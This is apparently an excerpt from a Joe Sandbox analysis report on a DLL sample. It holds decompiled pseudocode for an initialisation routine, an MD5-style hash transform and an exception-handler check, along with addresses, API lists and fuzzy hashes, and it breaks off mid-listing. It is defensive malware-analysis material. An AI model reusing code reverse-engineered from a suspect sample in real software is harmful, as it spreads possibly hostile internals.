                                          C-Code - Quality: 100%
                                          			E005F179C() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x5f4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x5f413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x5f412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x5f4128 = _t5;
						 *0x5f4130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x5f4124 = _t6;
						if(_t6 == 0) {
							 *0x5f4124 =  *0x5f4124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                          0x005f179d
                                          0x005f17ab
                                          0x005f17b1
                                          0x005f17b8
                                          0x005f180f
                                          0x005f180f
                                          0x005f17ba
                                          0x005f17c2
                                          0x005f17cf
                                          0x005f17cf
                                          0x005f180b
                                          0x005f180d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f17c4
                                          0x005f17cb
                                          0x005f17d1
                                          0x005f17d1
                                          0x005f17d6
                                          0x005f17e4
                                          0x005f17e9
                                          0x005f17ef
                                          0x005f17f5
                                          0x005f17fc
                                          0x005f17fe
                                          0x005f17fe
                                          0x005f1808
                                          0x005f17cd
                                          0x005f17cd
                                          0x00000000
                                          0x005f17cd
                                          0x005f17cb

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005F11E0), ref: 005F17AB
                                          • GetVersion.KERNEL32(?,005F11E0), ref: 005F17BA
                                          • GetCurrentProcessId.KERNEL32(?,005F11E0), ref: 005F17D6
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005F11E0), ref: 005F17EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentEventOpenVersion
                                          • String ID:
                                          • API String ID: 845504543-0
                                          • Opcode ID: 34210aa1248431c3606596f867e8c88305a85a40c91500a41c20b48156409b47
                                          • Instruction ID: a7c6047359a668df890ec8bbb7adfff14258e024900c058d99780a3890144ac6
                                          • Opcode Fuzzy Hash: 34210aa1248431c3606596f867e8c88305a85a40c91500a41c20b48156409b47
                                          • Instruction Fuzzy Hash: 38F08131980605EBE7106B79BC09B763F94B735752F100016E645C61E4E7788689EF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C75920, Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 49%
                                          			E00C75920(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                          0x00c75923
                                          0x00c7592e
                                          0x00c75931
                                          0x00c75934
                                          0x00c75935
                                          0x00c75953
                                          0x00c75955
                                          0x00c75958
                                          0x00c7595b
                                          0x00c7595b
                                          0x00c7595e
                                          0x00c7595e
                                          0x00c75961
                                          0x00c75961
                                          0x00c75964
                                          0x00c75964
                                          0x00c75981
                                          0x00c75984
                                          0x00c7599a
                                          0x00c7599d
                                          0x00c759b7
                                          0x00c759ba
                                          0x00c759d0
                                          0x00c759d3
                                          0x00c759d5
                                          0x00c759ed
                                          0x00c759f0
                                          0x00c759f3
                                          0x00c75a0b
                                          0x00c75a0e
                                          0x00c75a28
                                          0x00c75a2b
                                          0x00c75a41
                                          0x00c75a44
                                          0x00c75a46
                                          0x00c75a5e
                                          0x00c75a63
                                          0x00c75a66
                                          0x00c75a7c
                                          0x00c75a7f
                                          0x00c75a99
                                          0x00c75a9c
                                          0x00c75ab2
                                          0x00c75ab5
                                          0x00c75ab7
                                          0x00c75ad2
                                          0x00c75ad5
                                          0x00c75aec
                                          0x00c75aef
                                          0x00c75af3
                                          0x00c75b0c
                                          0x00c75b0f
                                          0x00c75b11
                                          0x00c75b14
                                          0x00c75b2f
                                          0x00c75b32
                                          0x00c75b4b
                                          0x00c75b4e
                                          0x00c75b5e
                                          0x00c75b61
                                          0x00c75b79
                                          0x00c75b7c
                                          0x00c75b96
                                          0x00c75b99
                                          0x00c75bb1
                                          0x00c75bb4
                                          0x00c75bca
                                          0x00c75bcd
                                          0x00c75be5
                                          0x00c75be8
                                          0x00c75c00
                                          0x00c75c03
                                          0x00c75c1d
                                          0x00c75c20
                                          0x00c75c36
                                          0x00c75c39
                                          0x00c75c51
                                          0x00c75c54
                                          0x00c75c6e
                                          0x00c75c71
                                          0x00c75c89
                                          0x00c75c8c
                                          0x00c75ca2
                                          0x00c75ca5
                                          0x00c75cbd
                                          0x00c75cc0
                                          0x00c75cd8
                                          0x00c75cdb
                                          0x00c75ced
                                          0x00c75cf0
                                          0x00c75d02
                                          0x00c75d05
                                          0x00c75d17
                                          0x00c75d1a
                                          0x00c75d1e
                                          0x00c75d2e
                                          0x00c75d31
                                          0x00c75d3f
                                          0x00c75d42
                                          0x00c75d54
                                          0x00c75d57
                                          0x00c75d6b
                                          0x00c75d6e
                                          0x00c75d70
                                          0x00c75d80
                                          0x00c75d83
                                          0x00c75d95
                                          0x00c75d98
                                          0x00c75da6
                                          0x00c75da9
                                          0x00c75dbb
                                          0x00c75dbe
                                          0x00c75dc2
                                          0x00c75dd2
                                          0x00c75dd5
                                          0x00c75de7
                                          0x00c75dea
                                          0x00c75df8
                                          0x00c75dfb
                                          0x00c75e0d
                                          0x00c75e10
                                          0x00c75e22
                                          0x00c75e25
                                          0x00c75e39
                                          0x00c75e3c
                                          0x00c75e50
                                          0x00c75e53
                                          0x00c75e67
                                          0x00c75e6a
                                          0x00c75e7e
                                          0x00c75e81
                                          0x00c75e95
                                          0x00c75e98
                                          0x00c75eac
                                          0x00c75eb1
                                          0x00c75ec3
                                          0x00c75ec6
                                          0x00c75eda
                                          0x00c75edd
                                          0x00c75ef1
                                          0x00c75ef4
                                          0x00c75f0a
                                          0x00c75f0d
                                          0x00c75f21
                                          0x00c75f24
                                          0x00c75f36
                                          0x00c75f39
                                          0x00c75f4d
                                          0x00c75f50
                                          0x00c75f64
                                          0x00c75f67
                                          0x00c75f7b
                                          0x00c75f84
                                          0x00c75f87
                                          0x00c75f90
                                          0x00c75f99
                                          0x00c75fa1
                                          0x00c75fa9
                                          0x00c75fb3
                                          0x00c75fc8

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                          • Instruction ID: 5dd9961dae4b77d4b8c203a3d9d1a490b6a3187d63d74abcd1f3dff8c93191d1
                                          • Opcode Fuzzy Hash: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                          • Instruction Fuzzy Hash: 7C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7B2FD, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C7B2FD(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xc7d2d8; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xc7d320 = 1;
										__eflags =  *0xc7d320;
										if( *0xc7d320 != 0) {
											goto L60;
										}
										_t84 =  *0xc7d2d8; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xc7d320 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xc7d2d8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xc7d2e0 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xc7d2dc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xc7d320 = 1;
							__eflags =  *0xc7d320;
							if( *0xc7d320 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xc7d320 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xc7d2e0 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xc7d2d8 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                          0x00c7b307
                                          0x00c7b30a
                                          0x00c7b310
                                          0x00c7b32e
                                          0x00000000
                                          0x00c7b32e
                                          0x00c7b318
                                          0x00c7b321
                                          0x00c7b327
                                          0x00c7b336
                                          0x00c7b339
                                          0x00c7b33c
                                          0x00c7b346
                                          0x00c7b346
                                          0x00c7b348
                                          0x00c7b34b
                                          0x00c7b34d
                                          0x00c7b34d
                                          0x00c7b34f
                                          0x00c7b352
                                          0x00000000
                                          0x00000000
                                          0x00c7b354
                                          0x00c7b356
                                          0x00c7b3bc
                                          0x00c7b3bc
                                          0x00c7b51a
                                          0x00000000
                                          0x00c7b51a
                                          0x00c7b358
                                          0x00c7b358
                                          0x00c7b35c
                                          0x00c7b35e
                                          0x00c7b35e
                                          0x00c7b35e
                                          0x00c7b35e
                                          0x00c7b361
                                          0x00c7b362
                                          0x00c7b365
                                          0x00c7b365
                                          0x00c7b369
                                          0x00c7b36d
                                          0x00c7b37b
                                          0x00c7b37b
                                          0x00c7b383
                                          0x00c7b389
                                          0x00c7b38b
                                          0x00c7b38d
                                          0x00c7b39d
                                          0x00c7b3aa
                                          0x00c7b3ae
                                          0x00c7b3b3
                                          0x00c7b3b5
                                          0x00c7b433
                                          0x00c7b433
                                          0x00c7b3b7
                                          0x00c7b3b7
                                          0x00c7b3b7
                                          0x00c7b435
                                          0x00c7b437
                                          0x00c7b518
                                          0x00c7b518
                                          0x00000000
                                          0x00c7b43d
                                          0x00c7b43d
                                          0x00c7b444
                                          0x00000000
                                          0x00000000
                                          0x00c7b44a
                                          0x00c7b44e
                                          0x00c7b4aa
                                          0x00c7b4ac
                                          0x00c7b4b4
                                          0x00c7b4b6
                                          0x00c7b4b8
                                          0x00000000
                                          0x00000000
                                          0x00c7b4ba
                                          0x00c7b4c0
                                          0x00c7b4c2
                                          0x00c7b4c4
                                          0x00c7b4d9
                                          0x00c7b4d9
                                          0x00c7b4db
                                          0x00c7b50a
                                          0x00c7b511
                                          0x00000000
                                          0x00c7b511
                                          0x00c7b4df
                                          0x00c7b4e0
                                          0x00c7b4e2
                                          0x00c7b4e4
                                          0x00c7b4e4
                                          0x00c7b4e6
                                          0x00c7b4e8
                                          0x00c7b4ea
                                          0x00c7b4fe
                                          0x00c7b4fe
                                          0x00c7b501
                                          0x00c7b503
                                          0x00c7b503
                                          0x00c7b504
                                          0x00c7b504
                                          0x00000000
                                          0x00c7b4ec
                                          0x00c7b4ec
                                          0x00c7b4ec
                                          0x00c7b4f5
                                          0x00c7b4f6
                                          0x00c7b4f8
                                          0x00c7b4fa
                                          0x00c7b4fa
                                          0x00000000
                                          0x00c7b4ec
                                          0x00c7b4ea
                                          0x00c7b4c6
                                          0x00c7b4cd
                                          0x00c7b4cd
                                          0x00c7b4cf
                                          0x00000000
                                          0x00000000
                                          0x00c7b4d1
                                          0x00c7b4d2
                                          0x00c7b4d5
                                          0x00c7b4d7
